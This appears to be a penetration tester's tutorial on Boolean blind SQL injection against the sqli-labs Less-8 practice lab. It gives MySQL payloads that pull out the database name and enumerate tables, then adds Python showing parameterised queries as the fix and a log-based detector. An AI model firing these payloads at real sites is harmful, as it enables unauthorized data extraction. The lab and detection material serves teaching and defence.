congdong007

Penetration Test, Software Developer


Boolean Blind SQL Injection

Boolean Blind SQL Injection Method

  1. First, obtain the length of the database name:

    ?id=1' and (length(database()))>n --+

  2. Next, retrieve the database name character by character:

    ?id=1' and (ascii(substr(database(),1,1))>n) --+

    Note: To determine the character at a given position, compare its ASCII value against n with a binary search rather than testing every value.
    To obtain the second character of the database name, change the position argument of "substr" from 1 to 2.
    The trailing "--+" is the MySQL comment sequence "-- " with the "+" decoding to a space in the URL.

  3. Use Burp Suite's Intruder module to iterate through the candidate values of n.

  4. Obtain the number of tables:

    ?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3 --+

  5. Retrieve the length of each table name, then its characters, in the same way.

  These steps outline a method for conducting a Boolean-based blind SQL injection to gather information about a database, such as the database name and the number of tables, using only the page's true/false behaviour.
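To show where the true/false oracle these steps rely on comes from, and what removes it, here is an added example that is not from the original post or from sqli-labs: a lookup that splices the parameter into the SQL text, modelled on the shape of the Less-8 query (an assumption), next to the same lookup with a bound parameter, both run against a constructed in-memory SQLite table. SQLite has no `database()` function, so a string literal stands in where the page uses it.

```python
import sqlite3

# Constructed in-memory stand-in for the application's "users" table
# (assumption: sqli-labs Less-8 runs a query shaped like
#  SELECT ... FROM users WHERE id='$id' LIMIT 0,1 and only reveals
#  whether a row came back; the rows and column names here are made up).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-1"), (2, "bob", "pw-2")])
    return conn

def vulnerable_lookup(conn, user_input):
    # The raw parameter is spliced into the SQL text, so a quote in the
    # input closes the literal and everything after it is parsed as SQL.
    # The caller only learns whether a row was found, which is exactly
    # the one bit a Boolean-blind probe needs.
    sql = f"SELECT username FROM users WHERE id='{user_input}' LIMIT 1"
    return conn.execute(sql).fetchone() is not None

def safe_lookup(conn, user_input):
    # Bound parameter: the driver passes the input as a value, never as
    # SQL text, so the quote, the AND clause and the comment are compared
    # against the id column as one opaque string and match nothing.
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_input,)).fetchone() is not None

def oracle_visible(lookup, conn):
    # True when the response differs between a true and a false injected
    # condition, i.e. when an attacker has a Boolean oracle to work with.
    # "-- " is the decoded form of the page's "--+" (the "+" is a space).
    return lookup(conn, "1' and 1=1 -- ") != lookup(conn, "1' and 1=2 -- ")

if __name__ == "__main__":
    db = make_db()
    print("concatenated query exposes oracle:", oracle_visible(vulnerable_lookup, db))
    print("parameterised query exposes oracle:", oracle_visible(safe_lookup, db))
```

Binding the parameter is the fix because it changes what the input *is* (a value) rather than trying to guess what characters an attacker might send; input validation on the id (for example, requiring an integer) is a useful second layer but is not a substitute for it.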

Example of Boolean Blind SQL Injection Operation

    http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=1 --+ correct
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=2 --+ error
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3 --+ correct
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 4 --+ error
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' union select 1,2,3 --+
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>7 --+ correct database name's length <=8
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>8 --+ error
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>114) --+
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>115) --+
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3 --+
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 4 --+
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
    http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 101) --+
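A request sequence like the one above leaves a very recognisable trail in the web server's access log: one client, many requests to the same endpoint, each differing only in a small comparison inside the `id` parameter. The following is an added example, not part of the original post, of detection logic run over constructed access-log lines that carry the page's probes URL-encoded; the client addresses, timestamps and sizes are made up, and the signature names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (Apache combined-style prefix). The
# request targets mirror the probes on this page, percent-encoded the way a
# browser or proxy would send them; IPs, timestamps and sizes are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:00 +0000] "GET /sqli-labs-master/Less-8/?id=1 HTTP/1.1" 200 612
10.0.0.9 - - [10/Oct/2023:12:00:01 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%201%3D1%20--+ HTTP/1.1" 200 612
10.0.0.9 - - [10/Oct/2023:12:00:02 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%201%3D2%20--+ HTTP/1.1" 200 431
10.0.0.9 - - [10/Oct/2023:12:00:03 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20order%20by%204%20--+ HTTP/1.1" 200 431
10.0.0.9 - - [10/Oct/2023:12:00:04 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20(length(database()))%3E7%20--+ HTTP/1.1" 200 612
10.0.0.9 - - [10/Oct/2023:12:00:05 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1))%3E114)%20--+ HTTP/1.1" 200 612
10.0.0.9 - - [10/Oct/2023:12:00:06 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20(select%20count(*)%20from%20information_schema.tables%20where%20table_schema%3D%27security%27)%20%3E%203%20--+ HTTP/1.1" 200 612
10.0.0.5 - - [10/Oct/2023:12:00:07 +0000] "GET /sqli-labs-master/Less-8/?id=2 HTTP/1.1" 200 598
"""

# Common log format prefix: client, ident, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signatures for the Boolean-blind stages described on this page, matched
# against the percent-decoded query string (names are this example's own).
SIGNATURES = {
    "tautology":       re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
    "order_by_probe":  re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "db_length_probe": re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I),
    "char_extraction": re.compile(r"\b(ascii|ord)\s*\(\s*substr\s*\(", re.I),
    "schema_enum":     re.compile(r"information_schema\.", re.I),
    "comment_tail":    re.compile(r"(--|#)\s*$"),
}

def parse_line(line):
    """Return the log fields plus the decoded query string, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # unquote_plus turns %27 into ' and the trailing "+" of "--+" into a space.
    rec["query"] = unquote_plus(urlsplit(rec["target"]).query)
    return rec

def classify(query):
    """Names of every signature that fires on one decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def analyse(log_text, min_hits=3):
    """Per-client summary of requests that match at least one signature.

    A single hit can be a false positive; a client accumulating several
    distinct stages (tautology, then length probes, then char extraction)
    is the pattern worth alerting on, hence the min_hits threshold."""
    per_ip = defaultdict(lambda: {"requests": 0, "hits": 0, "signatures": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        tags = classify(rec["query"])
        if tags:
            stats["hits"] += 1
            stats["signatures"].update(tags)
    return {ip: s for ip, s in per_ip.items() if s["hits"] >= min_hits}

if __name__ == "__main__":
    for ip, stats in analyse(SAMPLE_LOG).items():
        print(ip, stats["hits"], "of", stats["requests"], "requests;",
              ", ".join(sorted(stats["signatures"])))
```

Decoding before matching matters: the same probe can arrive with `%20`, `+` or `/**/` in place of spaces, and a signature written against the raw request line would miss most of them. In production the per-client threshold would be combined with the rate of requests to one endpoint and the alternation of response sizes (612/431 in the sample), which is the response-difference the attacker is reading.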